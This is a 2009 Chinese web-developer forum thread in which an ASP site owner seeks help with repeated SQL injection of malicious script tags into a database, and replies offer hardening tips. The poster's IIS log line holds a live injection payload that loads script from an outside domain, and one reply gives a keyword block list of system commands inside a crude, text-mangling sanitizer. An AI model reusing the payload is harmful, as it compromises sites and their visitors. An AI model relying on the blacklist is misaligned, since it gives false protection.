网站被挂木马了,如何解决。

izhibo8 2009-08-11 05:51:04
我的数据库被注入js代码,我的网站是asp+sql 写的,数据库里几乎所有的text、varchar字段都被js的内容代替。
我在asp 的conn里已经加入防注入关键字的判断,可是还是不行
我update后,几分钟,数据库就会再次注入js的代码,急求解决办法,我感觉像是中了木马,不然我每次update 后总是再次被注入!!!!

我分析iis 日志发现以下代码,
/head/13.gif%3C/title%3E%3Cscript%20src=http%3C/title%3E%3Cscript%20src=http:/252a.cn/1.js%3E%3C/script%3E - 80 - 125.70.103.133 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+TheWorld) ASPSESSIONIDCATDBDDS=BLKNDEJADMBMODNKLPGONPJF http://www.bbz.cn/passport.asp?uid=Y50206685 www.bbz.cn 200 0 0 (bbz是我的网站)

好像是通过图片传的?如何拦截
...全文
297 13 打赏 收藏 转发到动态 举报
写回复
用AI写文章
13 条回复
切换为时间正序
请发表友善的回复…
发表回复
xlyhj219 2009-08-18
  • 打赏
  • 举报
 回复
在IIS里面把用户上传图片的文件夹权限设置为不能执行脚本
devilidea 2009-08-18
  • 打赏
  • 举报
 回复
muguazhanfang1 2009-08-18
  • 打赏
  • 举报
 回复
1、禁用fso
2、设置空间的读写权限
3、查看数据库漏洞
4、查看编辑器中的相关漏洞!
ximengchang 2009-08-18
  • 打赏
  • 举报
 回复
可以把你的数据局做一些权限设置,不要用sa的用户,自己新建一个,然后给它各个表访问的不同权限,有的只能查询,有的可以插入,更新的定位到某个具体的字段,这样可以减少被攻击的概率,我原来也经常被注入,后来做了权限设置后,2年多了还没有被注入过,应该可以起不少作用,搂主可以试一下看看,呵呵
chenjianyong94 2009-08-18
  • 打赏
  • 举报
 回复 
 public static string NoHTML(string Htmlstring)

    {

        if (Htmlstring == null)

        {

            return "";

        }

        else

        {

            //删除脚本

            Htmlstring = Regex.Replace(Htmlstring, @"<script[^>]*?>.*?</script>", "", RegexOptions.IgnoreCase);

            //删除HTML

            Htmlstring = Regex.Replace(Htmlstring, @"<(.[^>]*)>", "", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, @"([\r\n])[\s]+", "", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, @"-->", "", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, @"<!--.*", "", RegexOptions.IgnoreCase);



            Htmlstring = Regex.Replace(Htmlstring, @"&(quot|#34);", "\"", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, @"&(amp|#38);", "&", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, @"&(lt|#60);", "<", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, @"&(gt|#62);", ">", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, @"&(nbsp|#160);", " ", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, @"&(iexcl|#161);", "\xa1", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, @"&(cent|#162);", "\xa2", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, @"&(pound|#163);", "\xa3", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, @"&(copy|#169);", "\xa9", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, @"&#(\d+);", "", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, "xp_cmdshell", "", RegexOptions.IgnoreCase);



            //删除与数据库相关的词 

            Htmlstring = Regex.Replace(Htmlstring, "select ", "", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, "insert ", "", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, "delete from ", "", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, "count''", "", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, "drop table ", "", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, "truncate ", "", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, "asc", "", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, "mid", "", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, "char", "", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, "xp_cmdshell", "", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, "exec master", "", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, "net localgroup administrators", "", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, " and ", "", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, "net user", "", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, " or ", "", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, " net ", "", RegexOptions.IgnoreCase);

            //Htmlstring =  Regex.Replace(Htmlstring,"*", "", RegexOptions.IgnoreCase);

            //Htmlstring =  Regex.Replace(Htmlstring,"-", "", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, "delete ", "", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, "drop ", "", RegexOptions.IgnoreCase);

            Htmlstring = Regex.Replace(Htmlstring, "script", "", RegexOptions.IgnoreCase);



            //特殊的字符

            Htmlstring = Htmlstring.Replace("<", "");

            Htmlstring = Htmlstring.Replace(">", "");

            Htmlstring = Htmlstring.Replace("*", "");

            Htmlstring = Htmlstring.Replace("--", "");

            Htmlstring = Htmlstring.Replace("?", "");

            Htmlstring = Htmlstring.Replace(",", "");

            Htmlstring = Htmlstring.Replace("/", "");

            Htmlstring = Htmlstring.Replace(";", "");

            Htmlstring = Htmlstring.Replace("*/", "");

            Htmlstring = Htmlstring.Replace("\r\n", "");

            Htmlstring = HttpContext.Current.Server.HtmlEncode(Htmlstring).Trim();



            return Htmlstring;

        }

    }
ToFindWorkOn 2009-08-12
  • 打赏
  • 举报
 回复
木马有什么用?
hongmaohouzi 2009-08-12
  • 打赏
  • 举报
 回复
更新一下你备份的数据库,然后检查系统的每个交互的页面的代码是否有系统漏洞,可以对一些特殊字符进行过滤,修改数据库的用户名和密码,分配好用户的使用权限。
ttt2 2009-08-12
  • 打赏
  • 举报
 回复
估计是自动注入,把fso禁了 adodb.stream禁了
izhibo8 2009-08-12
  • 打赏
  • 举报
 回复
我update后,把网站关闭(iis停止)后,没过几分钟又再次注入!!!!!!!!

请问是什么原因。、。。还是网站的漏洞吗
三楼の郎 2009-08-12
  • 打赏
  • 举报
 回复
查sql注入漏洞
ywfsoft 2009-08-12
  • 打赏
  • 举报
 回复
1.用SQL语句 


updatesql="update table set fildes=replace(values,'javascript代码','')"

conn.execute (updatesql)

2.然后检查系统的每个交互的页面的代码是否有系统漏洞,可以对一些特殊字符进行过滤,修改数据库的用户名和密码,分配好用户的使用权限
3.查一下代码文件中是否有可疑的文件,
ywfsoft 2009-08-12
  • 打赏
  • 举报
 回复
1.用SQL语句 


updatesql="update table set fildes=replace(values,'javascript代码','')"

conn.execute (updatesql)

2.然后检查系统的每个交互的页面的代码是否有系统漏洞,可以对一些特殊字符进行过滤,修改数据库的用户名和密码,分配好用户的使用权限
3.查一下代码文件中是否有可疑的文件,
dima302 2009-08-11
  • 打赏
  • 举报
 回复
木马确实很可恶,帮楼主顶一下,顺便学习一下。
ASP网站中数据库被木马解决方案
我们在用ASP连接数据库开发应用程序时,可能会遇到ASP数据库被木马的情况,本文我们就介绍了ASP数据库被木马时的编程处理方法,希望会对您有所帮助。
解决网站IFRAME木马的原理
相信大多数朋友都是iframe木马的受害者,有朋友的网站被注入了n回iframe,心情可想而知。而且现在ARP攻击,注入iframe也是轻而易举的事,仅局域网里都时刻面临威胁,哎,什么世道。接近年关,为了防止更多的朋友受到攻击,于是细细说下。 灵儿曾经在经典论坛上发过贴子:《一行代码解决网站IFRAME木马方案》,有不少朋友都联系了灵儿,有的表示感谢,不过更多的是疑问了,今天把原理细细地讲一下吧: IE Only——一般只有IE害怕iframe这样的马,所以灵儿就拿IE开刀。 在阅读本文之前,我们先了解一下expression; IE5及其以后版本支持在CSS中使用expression,
二行代码解决全部网页木马
前不久一行代码解决iframe马(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在网马的方式真如我所料地改变了,现在流行[removed]木马,汗了,看了几个网友的网站都被这样了——页面的顶部或底部加上了: 注意,以下地址含有木马,请不要轻易访问: [removed][removed] [removed][removed] [removed]</scri
解决全部网页木马的技巧
还是马问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。哎,想想,还是要抽空来来帮帮大家。 前不久《一行代码解决iframe马(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在网马的方式真如我所料地改变了,现在流行[removed]木马,汗了,看了几个网友的网站都被这样了——页面的顶部或底部加上了: 注意,以下地址含有木马,请不要轻易访问: [removed][removed][removed][removed]
快速清除html,asp
本程序主要针对页面被JS木马,如果采用重新上传的方法肯定费时间,单个修改就太笨了,这里是总结我自己被马经验,找出的5分钟内清除所有被木马程序。下载后你也可以根据自己的情况修改,里面还有具体的使用方法。希望大家不要被木马折磨了,虽然治标不治本,但是能解决网站打开提示木马
ASP

28,391

社区成员

357,060

社区内容

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今

加载中

查看更多榜单
社区公告
暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章